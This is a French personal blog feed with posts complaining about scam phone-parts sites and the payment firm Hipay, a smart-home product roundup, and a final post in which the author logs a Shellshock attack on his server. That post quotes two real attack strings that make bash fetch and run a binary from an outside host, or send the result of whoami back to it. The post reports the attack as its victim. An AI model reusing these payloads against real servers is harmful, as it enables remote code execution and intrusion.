Thu, 12 May 2016 00:00:00 +0000

La patience finit toujours par payer, depuis le 14 mars 2016 j’essaye de rentrer en contact avec Docteur-gsm.com mais sans succès. J’ai essayé toutes les adresses emails disponibles :

Et finalement j’ai choisit d’attaquer hipay.com afin que eux fasse pression sur Docteur-gsm.com. J’ai donc eu droit ce soir à une réponse de Docteur-gsm.com avec leur vrai email : extremedealsltd@gmail.com . Mais chut il ne faut pas le dire ;) Si on fait une recherche sur l’email on voit que le site cootex.fr est aussi avec cet email.

Java bien ? Disons que JBOSS pour ...

Tue, 19 Apr 2016 00:00:00 +0000

Aux tout petits je dis “Java c’est caca”, le mieux c’est faire un serveur avec vi en C … bon j’exagère avec vim :) . En plus maintenant Docker va emmener ce qu’il manquait aux programmes C.

Un petit article qui n’a aucun rapport avec cela : http://securityaffairs.co/wordpress/46362/hacking/jboss-backdoor.html

Experts at Cisco Systems discovered more than 3 million vulnerable servers exposed on the Internet while scanning for the presence of JBOSS Backdoor … The web scanning activity allowed the researchers to discover about 2,100 compromised servers belonging to schools, governments, aviation companies, and other types of organizations. The hackers installed webshells to maintain the control over the infected systems.

Hipay.com : vérification des sites

Tue, 12 Apr 2016 00:00:00 +0000

Merci à Hipay.com de ne pas avoir utiliser un template après 10 emails de ma part:

“Nos équipes vérifient tous les sites avec lesquelles nous collaborons, ensuite, tout au long de la collaboration, nous vérifions régulièrement les activités de nos clients.

Lorsqu’il s’avère qu’un site est frauduleux, nous arrêtons toute collaboration avec celui-ci et bloquons le compte marchand ouvert chez nous. "

Donc si j’ai bien compris vous avez vérifié les sites de docteur-gsm.com et de paradisdiscount.com . Vous faites un “ping” pour faire la vérification d’un site ?

Hipay.com : temps de réponse très long ... pour ne rien dire !

Mon, 11 Apr 2016 00:00:00 +0000

Quand on envoi un email à Hipay.com, il ne faut pas être pressé d’avoir une réponse. Dans l’accusé de réception on peut lire : “Nous répondons à tous les emails dans un délai de 24h à 48h ouvrables.”

Voici la liste des emails que j’ai envoyé afin de mieux se faire une idée sur le délai réel :

ID	Date accusé	Date réponse	Ecart	Réponse
(1) TK_2373926	14 mars 2016	22 mars 2016	8 jours	Template B
(2) TK_2374112	15 mars 2016	22 mars 2016	7 jours	Template B
(3) TK_2375129	17 mars 2016	Pas de réponse		Template B
(4) TK_2375573	18 mars 2016	29 mars 2016	11 jours	Template B
(5) TK_2376175	19 mars 2016	30 mars 2016	11 jours	Template B
(6) TK_2376178	19 mars 2016	Pas de réponse
(7) TK_2378959	26 mars 2016	5 avril 2016	10 jours	Template C
(8) TK_2386138	12 avril 2016	Pas de réponse
(9) TK_2386573	12 avril 2016	Pas de réponse
(10) TK_2392748	12 & 26 avril 2016	27 avril 2016		Template C
(11) TK_2393872	28 avril 2016	En attente de réponse		?
(12) TK_2396392	3 mai 2016	En attente de réponse		?
(13) TK_2400866	12 mai 2016	En attente de réponse		?

J’ai l’impression que leur template n’est pas bon, je vais donc leur faire un petit email pour continuer à venter “leurs services”.

Lettre ouverte hipay.com

Sat, 26 Mar 2016 00:00:00 +0000

Bonjour,

J’ai pu voir que ce n’est pas la première fois qu’il y a un problème avec un site marchand. Quand on regarde ce post : http://www.60millions-mag.com/forum/commerce-en-ligne/rdcommerce-une-t8574.html qui date du 17 Juillet 2014 au sujet de RDcommerce.com . On peut voir de nombreux commentaires commentaires du type :

“HIPAY ( Vive la belgique…) cautionne cette ***”
…

Même après de nombreuses plaintes vous autorisiez encore le paiement pour ce site. C’est exactement le même problème pour docteur-gsm.com ou paradisdiscount.com pour lequel vous avait dû recevoir des dizaines voir des centaines d’email.

Recherche sur le site paradisdiscount.com et docteur-gsm.com

Fri, 25 Mar 2016 00:00:00 +0000

Je fais suite à mon précédent post: https://www.cyber-neurones.org/2016/03/escroquerie-sur-les-sites-paradisdiscount-com-et-docteur-gsm-com-permisse-par-hipay-com/

Que faire si vous vous êtes fait avoir ?

Il faut déposer une plainte sur le site : https://www.internet-signalement.gouv.fr/. Ne rien faire, c’est permettre à la personne de continuer son trafic. Et il faut aussi le signaler sur le site : https://www.econsumer.gov (c’est plus pénible à remplir car c’est mal adapté).

Début des recherches :

On va donc faire une petite enquête pour savoir quel est le réseau qui est derrière cela.

Escroquerie sur les sites paradisdiscount.com et docteur-gsm.com via hipay.com

Tue, 22 Mar 2016 00:00:00 +0000

De nombreuses personnes se sont faites avoir sur les sites paradisdiscount.com et docteur-gsm.com comme j’ai pu le voir quand j’ai fait ma recherche pour l’écran de l’ALCATEL IDOL 3.

J’ai déplacé le passage ou je déconseille vivement l’utilisation des sites avec pour paiement hipay.com:

https://www.cyber-neurones.org/2017/07/hipay-com-les-menaces/
https://www.cyber-neurones.org/2017/07/escroquerie-sur-les-sites-paradisdiscount-com-et-docteur-gsm-com-permisse-par-hipay-com-censure/
et ne pas oublier de faire le signalement : https://www.internet-signalement.gouv.fr/.

Le réseaux semble assez complexe, mais je devrais bientôt pouvoir faire un schéma assez clair de celui-ci. Il est très important d’éviter les sites suivants :

Test docteur-gsm.com et paradisdiscount.com

Thu, 17 Mar 2016 00:00:00 +0000

C’est rigolo non ? je marque “(Choix suicidaire) . Prendre la pièce sur docteur-gsm.com ou paradisdiscount.com” et tu cliques sur le lien ?

Je te donne donc la définition de suicidaire : “Qui mène au sucide” . Tu ne vas jamais recevoir ta piece, et si tu la recois au bout de 30 jours tu vas voir que c’est une mauvaise contrefaçon.

Vu que je tiens à ta vie je ne te donne pas le lien ;)

Synereo : un projet intéressant à suivre !

Mon, 22 Feb 2016 00:00:00 +0000

Le lien : http://www.synereo.com , pour l’instant le projet est en cours de création.

Quelques explications sur site en Francais :) : http://blockchainfrance.net/2015/10/23/blockchain-reseau-social/ .

Sur Synereo, c’est donc votre rayonnement et la pertinence de ce que vous publiez qui seront vos armes pour gagner l’attention de votre réseau et au delà. Ce qui veut également dire que la valeur de votre attention, de vos efforts de publication ou de la diffusion de vos informations personnelles ne se retrouve pas dans les poches d’un Facebook ou d’un Twitter, mais bien dans les vôtres, grâce au système de l’AMP**.**

Smart Home : petite recherche sur Internet ...

Tue, 20 Jan 2015 00:00:00 +0000

Les solutions “Smart Home” ( ou “Domotique” ) :

1- Archos :

http://www.archos.com/fr/products/objects/chome/ash/index.html : 230€.

2- Netamo :

https://www.netatmo.com/fr-FR/produit/camera : (Alarme) & (Contrôle d’énergie)

3- Google : (Nest) :

http://www.cnet.com/news/google-closes-3-2-billion-purchase-of-nest/ :
“Nest” : https://nest.com (Controle d’energie):
“Revolv” : http://revolv.com

4- Apple :

“HomeKit” : https://developer.apple.com/homekit/
“iSmartAlarm” : http://store.apple.com/fr/product/HE225ZM/A/système-de-sécurité-résidentiel-ismartalarm-–-ensemble-deluxe : 250€

5- Samsung :

“SmartThings” http://blog.smartthings.com :

6- Honeywell :

“Le Sucre” : http://www.security.honeywell.com/uk/products/intruder/control-panels/le-sucre/panel/853975.html (Alarme).
- http://www.blog-alarme.com/honeywell-sucre-systeme-dauto-surveillance-distance-habitations/
- https://www.youtube.com/watch?v=La-7XmHvdO4
“EvoHome” : http://getconnected.honeywell.com/en/thermostats/evohome (Controle d’energie)

7- Insteon :

http://www.domadoo.fr/fr/box-domotique/110-insteon-controleur-hub-ethernet-0813922012958.html#

8- Siemens :

“Sync living” : http://www.buildingtechnologies.siemens.com/bt/global/en/buildingautomation-hvac/home-automation-system-synco-living/system/pages/system.aspx .

9- Neeo :

http://www.neeo.com :

10- General Electric :

“quirky” : https://www.quirky.com/shop#.

11- Cocoon :

https://cocoon.life

12- Toshiba :

“Pluzzy” : http://www.pluzzy.com :

13- iControl network :

http://www.icontrol.com
- “Piper” http://www.domadoo.fr/fr/box-domotique/2655-icontrol-pack-piper-2-modules-prises-z-wave.html# : 300 €

14- Jeedom :

“Raspberry Pi”
- http://www.domadoo.fr/fr/informatique/2576-jeedom-pack-de-demarrage-jeedom-mini-z-wave-rfxcom.html# : 209 €
- https://jeedom.fr : De l’OPENSOURCE …
- http://www.domotique-info.fr/2014/11/jeedom/ : “Je ne suis pas sur d’avoir connaissance d’une solution commerciale qui fasse beaucoup mieux voir autant.”

15- Fibaro :

http://www.domadoo.fr/fr/box-domotique/2508-fibaro-controleur-domotique-z-wave-home-center-lite-5902020528234.html#

16- Vera :

“VeraEdge” http://blog.domadoo.fr/2014/12/01/guide-dinstallation-de-la-box-domotique-veraedge-de-vera-control/ : 190 € .

17- Orange :

“Home Live” : http://homelive.orange.fr/piloter-maison-intelligente/

18- SimpliSafe :

http://simplisafe.com

19- Belkin :

“WeMo” : http://www.belkin.fr/produits-maison-connectee-domotique-wemo/

20- Philips :

“Hue” : http://www.domotique-info.fr/2014/11/philips-hue-decouverte-mise-en-place/

21- August :

“August Smart Lock” : http://august.com/

22- Autres projets à suivre :

“Linkio” : https://www.kickstarter.com/projects/2097793904/linkio

23- SOMFY :

“TaHomA” : http://www.somfytahoma.com/

24-HIVE :

“Hive” : https://www.hivehome.com/ (Controle d’energie)

25-Salus Control:

“IT500” : http://www.salus-tech.com/products/thermostat/it500/

A lire aussi :

Sécurité : shellshock ...

Thu, 06 Nov 2014 00:00:00 +0000

Attaque sur mon serveur :

WinInet Test
curl/7.19.7 (i386-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.6.0 zlib/1.2.3 libidn/1.18 libssh2/1.4.2				cURL
() { :;}; /bin/bash -c \\"wget http://ntontomou.com/s ;chmod +x s ; ./s\\"

Un petit Whois sur : http://www.ntontomou.com/ : https://who.is/whois/ntontomou.com …. il reste plus qu’a contacter http://www.enom.com. Misère.

D’après les logs c’est pas son premier essai :

() { :;}; /bin/bash -c \“curl http://ntontomou.com/custom/ping.php?domain=sphinux.org\\&whoami=`whoami`\”

D’abord du PHP puis maintenant un soft en C.